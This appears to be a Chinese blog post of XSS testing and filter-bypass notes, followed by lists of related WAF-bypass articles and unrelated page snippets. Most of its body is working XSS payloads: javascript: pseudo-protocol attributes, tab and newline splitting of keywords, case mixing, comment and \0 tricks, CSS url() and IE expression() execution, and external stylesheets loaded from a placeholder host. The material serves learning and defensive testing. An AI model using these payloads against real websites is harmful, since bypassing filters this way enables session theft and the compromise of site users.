来源《XSS跨站脚本攻击剖析与防御》&《WEB前端技术揭秘》

一、一般测试方法

步骤:

0.总则:见框就插

1.在输入框随便输入一些简单的字符,如 aaa,方便后续查找输出位置

2.按下F12打开开发者模式,ctrl+F键,搜索 aaa

3.多数情况下是在标签的value="aaa"中,或者独立出来包含在一些别的标签中,如divspan

4.根据特定情况构造payload,一般是直接构造标签或者闭合标签再构造或者利用伪协议

二、常用技巧

  • 1.JS伪协议利用

形式:javascript:[代码]

示例:<table background="javascript:alert(1)"></table>,引号可以去掉

支持伪协议的属性有:href,lowsrc,bgsound,background,action,dynsrc

  • 2.基于黑名单的过滤

js代码 中,利用空格回车tab键,切记只有""包裹的js代码才可以随便利用空格、回车、tab键,例如src="java script:xxxx",而这样不行:src=java script:xxxx

,而且回车、换行不支持在on事件中使用,空格可以

js引擎特性:js语句通常以分号结尾,但是如果引擎判断一条语句完整的话,且结尾有换行符,就可以省略分号

例:

var a = 1
var b = 2;
//上述语句正确

示例:<img src="javas cript:alert(1)">,中间为tab键

    用于绕过某些XSS防护
<img src="jav ascript:alert('XSS');"> 也可以对TAB编码
<img src="jav ascript:alert('XSS');"> 利用换行符拆解
<img src="jav ascript:alert('XSS');"> 利用回车拆解
<img src="jav ascript:alert('XSS');">

② 大小写混淆

示例:<IMg SRc oNERRoR=aLERT(1)>

③ 编码绕过

暂无

④ 奇淫技巧

1.过滤引号

策略:双引号不行单引号;单引号不行不要引号;不要引号不行试试反引号 `(IE支持)

2.过滤空格

策略:/**/,注释符号绕过;/符号绕过;

例:<img/src/onerror=alert(1)>

3.属性关键词被过滤

策略:插入/**/\\0

示例:

//1.`/**/`
<img src="java/*/*javascript*/script/*javascript*/*/script:alert(1);"> //2.`\`、`\0`只能在css样式\js中使用,两者会被浏览器忽略
<style>
@\0im\port'\0ja\vasc\ript:alert(1)';
//此处用到了@import,详细@import解释在后面
</style> 4.`<!-- -->`注释绕过
`<!--<img src="--><img src onerror=alert(1)//">`
解释: `<style><img src="</style><img src onerror=alert(1)//">`
解释:

5.利用 JSFuck 绕过关键词过滤

JSFuck

  • 3.js事件执行代码

示例:<img src onerror=alert(1)>

js事件:onerror,onclick,onmouseover,onkeydown·········

其他事件查询:https://www.w3school.com.cn/tags/html_ref_eventattributes.asp

  • 4.利用css跨站 (style属性或者style标签)

    ① 直接执行

利用的是属性中的 url ,跟伪协议相似

示例:

//1.
<div style="background-image:url(javascript:alert(1))"> //2.
<style>
body{background-image:url(javascript:alert(1));}
</style> //3.
<div style="list-style-image:url(javascript:alert(1));">

② IE 下利用 expression

解释:expression用来吧CSS属性与js表达式关联起来,其中CSS属性可以是元素固有的属性,也可以是自定义属性,如下示例中的1、2,

示例:

//1.
<div style="width:expression(alert(1));"> //2.
<img src="#" style="xss:expression(alert(1));"> //3.
<div style="list-style-image:expression(alert(1));"> //4.
<style>
body{background-image:expression(alert(1));}
</style>

③ 引用外部css文件执行xss

示例:

//1. 利用 link 标签
<link rel="stylesheet" href="http://www.mysite.com/eval.css"> //2.利用 @import 导入
<style type="text/css"> @import url(http://www.mysite.com/eval.css);</style> //3.@import特性--直接执行js代码
<style>
@import "javascript:alert(1)";
</style>

三、更新内容 -- 利用JS全局变量绕过XSS过滤器

原文地址:

XSS之绕过WAF总结的更多相关文章

  1. WAF指纹识别和XSS过滤器绕过技巧

    [译文] -- “Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters” 0x1 前言 之前在乌云drop ...

  2. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  3. SQL注入9种绕过WAF方法

    SQL注入9种绕过WAF方法 0x01前言 WAF区别于常规 防火墙 是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门.通过检查HTTP的流量,它可以防御Web应用安 ...

  4. 用最短的payload绕过WAF(入门)

    本文作者:jishuzhain <font color=green>想绕过一个WAF,我们可以用最短的payload来做,这里只是基础示例,望各位大佬勿喷,小弟在此谢过.</font ...

  5. 技术分享:杂谈如何绕过WAF(Web应用防火墙)(转)

    0×01开场白 这个议题呢,主要是教大家一个思路,而不是把现成准备好的代码放给大家. 可能在大家眼中WAF(Web应用防火墙)就是"不要脸"的代名词.如果没有他,我们的" ...

  6. XSS插入绕过一些方式总结

    详见:http://blog.csdn.net/keepxp/article/details/52054388 1 常规插入及其绕过 1.1 Script 标签 绕过进行一次移除操作: <scr ...

  7. 1.如何绕过WAF(Web应用防火墙)

    一:大小写转换法: 看字面就知道是什么意思了,就是把大写的小写,小写的大写.比如: SQL:sEleCt vERsIoN(); ‍‍XSS:)</script> 出现原因:在waf里,使用 ...

  8. 绕过WAF进行常见Web漏洞利用

    前言 本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法. PS:本文仅用于技术研究与讨论,严禁用于任何非法用途,违者后果自负,作者与平台不承担任何责任 PPS:本 ...

  9. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

随机推荐

  1. iOS中使用block进行网络请求回调

    iOS中使用block进行网络请求回调 HttpRequest.h // // HttpRequest.h // UseBlockCallBack // // Created by Michael o ...

  2. 超级干货:动态防御WAF技术原理及编程实战!

    本文带给大家的内容是动态防御WAF的技术原理及编程实战. 将通过介绍ShareWAF的核心技术点,向大家展示动态防御的优势.实现思路,并以编程实战的方式向大家展示如何在WAF产品开发过程中应用动态防御 ...

  3. scrapy 执行同个项目多个爬虫

    一开始我们默认都是只有一个爬虫的,所以执行的代码都是在项目下创建一个py文件 from scrapy import cmdline cmdline.execute('scrapy crawl 爬虫名' ...

  4. js 模拟滚动条

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  5. vue的$message(提示框换行)

    之前一直在搜怎么让提示框的文字换行,网上搜到的基本都是使用 ‘ /n ’,使用无效,也试了css换行,本来想用弹窗自己编辑html内容,还好回去官网看了一下: let arr = ['测试一', '测 ...

  6. JS中的call()方法和apply()方法用法总结(挺好 转载下)

    最近又遇到了JacvaScript中的call()方法和apply()方法,而在某些时候这两个方法还确实是十分重要的,那么就让我总结这两个方法的使用和区别吧. 1. 每个函数都包含两个非继承而来的方法 ...

  7. 【Elasticsearch】查询并删除匹配文档之_delete_by_query

    思路:先查询确认,后精准删除 假设我想删除title是"小明今晚真的不加班"这条记录,先查看一下现有的记录: (不加班不好吗?为什么要删除呢?) tips:可以使用match_ph ...

  8. 2019.3.14解题报告&补题报告

    A题 题意: 输入r, c,代表r*c的矩阵,接下来一行,是r个数,代表每一行里最大的数:接下来一行,是c个数,代表每一列中的最大数.求所给数据是否冲突. 思路:判断r个数中最大数maxr和c个数中最 ...

  9. sql 语句系列(多表之链)[八百章之第三章]

    新增连接查询而不影响其他连接查询 请看图: 这种情况我们一般会使用左连接的方式. select e.ENAME,d.LOC,eb.RECEIVED from emp e join dept d on( ...

  10. WTM 3.5发布,VUE来了!

    千呼万唤中,WTM的Vue前后端分离版本终于和大家见面了,我曾经跟群里1000多位用户保证过Vue版本会在春天到来,吹过的牛逼总算是圆上了. WTM一如既往地追求最大程度提高生产效率,所以内置的代码生 ...